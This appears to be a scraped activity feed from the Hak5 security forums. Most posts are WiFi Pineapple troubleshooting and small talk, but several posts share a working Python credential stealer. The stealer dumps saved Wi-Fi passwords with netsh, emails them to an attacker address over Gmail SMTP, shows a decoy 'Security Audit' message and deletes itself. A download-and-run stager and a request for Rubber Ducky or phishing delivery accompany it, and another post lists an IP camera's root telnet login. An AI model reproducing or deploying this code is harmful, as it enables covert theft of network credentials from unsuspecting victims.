Hak5 Forums

All Activity

  1. Today
  2. Hello, thanks for the work and effort you guys are putting into researching this. I was wondering if anyone here knows if it would be viable to do the same modifications to the DJI Go 3 app (for models before Phantom 4) in order to enforce FCC mode. Thank you in advance!
  3. I want to use Charles/Fiddler to capture HTTPS traffic from an application. After installing a trusted root certificate I've noticed that not every application will accept it. For example, I can intercept all requests made by Chrome, but on Firefox I need to add the trusted certificate. When capturing traffic for a Java application, the certificate needs to be added to the JVM TrustStore, and in the case of a Python script we need to add a line of code that uses the exported certificate. How can I analyze requests made by some software that supports a proxy (so a reverse proxy can be easily used), but after running it I cannot get plaintext as it needs a trusted certificate?
  4. SSID Names and Passwords

    I posted this in a separate HAK5 forum room. What do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.
  5. Identify SSID and Steal Wifi Credentials

    I want to be able to use the above code in a Penetration Testing Engagement, either via Phishing or Rubber Ducky. Here is what I did to test it.

        # Create a local directory to act as the "malicious_server"
        # In cmd.exe go to "malicious_server" directory
        C:\> cd $filepath\malicious_server
        # I'm using python3.6, standup a http.server
        C:\filepath\malicious_server>python -m http.server 8080
        # Next, we can probably make this into a oneliner and apply it to a rubber ducky or phishing attack

        #!/usr/bin/env python
        import urllib.request
        import os
        import subprocess

        filename = os.path.expanduser(path='~\Downloads\wifipw.py')
        urllib.request.urlretrieve('', filename)
        subprocess.call(filename, shell=True)

        # An example of the outcome will be something like the following in an email:
        ssid_name1 | password1
        ssid_name2 | password2
        ssid_name3 | password3

    The script will automatically remove itself from the system.
  6. I liked a @YouTube video https://t.co/giJYvZJVw5 DRAW MY LIFE - Jack Douglass

  7. WiFi Pineapple Mark V - Any For Sale?

    2 Mark V's for sale. One brand new in box. The other slightly used. Negotiable..Make reasonable offer. May be even willing to trade. Together or separately..
  8. OVPN doesn’t seem to work on client=0

    everything is working now :) thanks!
  9. Regardless of which team wins the #FinalRegia, its fans are going to be https://t.co/NIxUohXJHA.bles for a good while.

  10. Identify SSID and Steal Wifi Credentials

    So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems. I'm sure many of you have come across companies that use username and password for their company's access points. I'm fairly new at writing python scripts so please bear with me. Credit goes out to youtube channel "pytutorials" for the wifi_passwords function.

        # Tested on Windows 10 - with McAfee AntiVirus
        # Runs a subprocess - netsh and identifies SSID names and Passwords
        # Packages the findings and sends wireless SSIDs and Credentials to an email
        # Requirements
        ## Sender Gmail Email Address
        ## Sender Gmail API Key
        ## Email address of the person receiving the SSID names and Credentials

    How can we package this into a Rubber Ducky?

        #!/usr/bin/env python
        import subprocess
        import tempfile
        import time
        import smtplib
        from email.mime.text import MIMEText
        from os import remove
        from sys import argv

        print('Security Audit will take one minute')

        # from_address = Senders email address
        from_address = 'who_it_is_from_email_address_here'
        # to_address = Receivers email address
        to_address = 'receiver_email_address_here'
        # api_key = Gmail API key
        api_key = 'who_it_is_from_gmail_api_key_here'

        #Create a temporary file to write SSID and wifi_passwords
        fp = tempfile.TemporaryFile(mode='w+t')

        def wifi_passwords():
            "This writes to tempfile SSID and Password"
            a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
            a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
            for i in a:
                results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
                results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
                try:
                    fp.write(str("{:<30}| {:<}\n".format(i, results[0])))
                except IndexError:
                    fp.write(str("{:<30}| {:<}\n".format(i, "")))
                except KeyboardInterrupt:
                    print("User stopped program!")
            fp.seek(0)

        def send_message():
            "Sends an email with SSIDs and Creds"
            msg = MIMEText(fp.read())
            msg['From'] = from_address
            msg['To'] = to_address
            msg['Subject'] = 'SSIDs and Creds'
            server = smtplib.SMTP('smtp.gmail.com', 587)
            server.starttls()
            server.login(user=msg['From'], password=api_key)
            server.send_message(msg)
            server.quit()

        wifi_passwords()
        send_message()
        fp.close()
        # Below self destructs the python script when executed
        remove(argv[0])
  11. Yesterday
  12. Hey Guys, Dwall works two ways for me. The first is it records the URL, cookies, etc., but Dwall does not allow for the client computer to connect through the pineapple to receive any of the requested information from the site. The other thing that happens is the browser receives the search request, but fails to log the information of this request in Dwall. For me, I can not get the URL of the client browser to be logged in Dwall, while permitting the client computer the access to the URL it requested. Is this just the way Dwall functions? Or do I have an issue? Please Advise. Thank you.
  13. Http Proxy

    I saw there were two new modules, MAC Addresses & HTTP proxy. HTTP Proxy downloaded fine but kept screwing up my tetra. Had to hard factory restart it twice. I’m not sure how to implement it which could be why it causes everything to freeze. I think it’s either using too much memory or all the interfaces were being proxied. I was attached via eth1 over https but each time the interface stopped responding, wouldn’t load anything or allow any traffic through. Does anyone have any insight into this new module?
  14. Sharing bank account number and sort code

    This info could be used to kite checks and harm the person's or business's reputation.
  15. Best way to "hack" ip-camera?

    (bugmenot account) I hacked this camera's telnet. Username: root Password: noty See also: https://www.domoticz.com/forum/viewtopic.php?f=35&t=17059&start=20#p161045
  16. RT @darksim905: Well that's new. Ugh. 😂😔😲😭 https://t.co/qrEAsVI4EN

  17. What Kali tools do you use most often?

    Well, it's a good reference I suppose. :P
  18. What Kali tools do you use most often?

    yah sorry lol it needs a spoiler
  19. Nano - Not able to add clients to the filter

    Brilliant, thank you. I'll quickly find a spare and give you a bell on IRC - #legend
  20. Nano - Not able to add clients to the filter

    Get an SD in the nano ASAP, there is limited space on the device and could be the root cause of some of your issues. Once you have the card in make sure you use the format function to make sure the card is set up correctly. Also if I were you I would do a firmware recovery ASAP after getting the SD sorted. I'm still on IRC if you want to go through it step by step?
  21. Nano - Not able to add clients to the filter

    Yep, clients are moving over to the filter. I'm starting to get a sense I'm doing this all wrong... Nope, no SD card yet. Just out of the box. Also, 5-10 minute scan is the same results. Yep, those are the pages I've been following. I originally followed this video - https://www.youtube.com/watch?v=eHnQwTCKe2o
  22. Nano - Not able to add clients to the filter

    The clients tab is for connected clients. Adding clients to the filter would add them to the filter page, do you see them there? From memory this is for finding what other networks a device is/has probed for. Are you doing long recon scans 5-10mins? Also just a thought, you're using an SD card in the pineapple right? Did you change the log location to the SD? Did you follow the "Firmware recovery" instructions here https://wifipineapple.github.io/wifipineapple-wiki/#!troubleshooting.md and here https://www.wifipineapple.com/pages/faq ?
  23. Nano - Not able to add clients to the filter

    So after a recon scan it collects SSID(s) and clients attached. When I select them and add to PineAP filter, it says successful. When I go to the client's tab everything is empty. In the Recon tab I select the client MAC, PineAP Logged Probes and I usually get " No Probes found. Is probe logging enabled? " It's definitely on. Nope, just a 404 error when I try this then?
  24. Nano - Not able to add clients to the filter

    Do you mean the pineapple is not collecting clients when PineAP is enabled with all options checked? Or you can't add clients to the filter? How so? Do you mean recon is not returning results? Or maybe the logs themselves? When doing a firmware recovery the pineapple defaults to, this indeed can clash with a home router using the same IP. However if you have already downloaded the required factory flash file then you could actually disconnect temporarily from your home network to complete the reflash. The pineapple will reboot and return to once done. And that's when you ask the community for some help :)
  25. I've been looking forward to getting one, it finally turned up. Everything went well with the firmware update and I've gone through a plethora of tutorials and videos on the first usage, but... I can't add clients to the client module, it just stays blank, even after a refresh. Also, the probe logging is a little hit and miss. Has anyone else had problems like this? I've done a few factory resets, I've even tried the firmware update but when I change the ipconfig ifconfig eth1 netmask up and try and connect to it auto loads my router device. You ever get that disappointing feeling when you really want something and then it really disappoints! That's me right now :-(
  26. What Kali tools do you use most often?

    You literally could have just left the link instead of listing every tool(and we aren't always 100% up to date, you can use the [ apt search ] feature to find a lot of things that might already be in there not listed on the site, or just for general purpose linux tools and programs you may need, like say, Chromium vs default FF.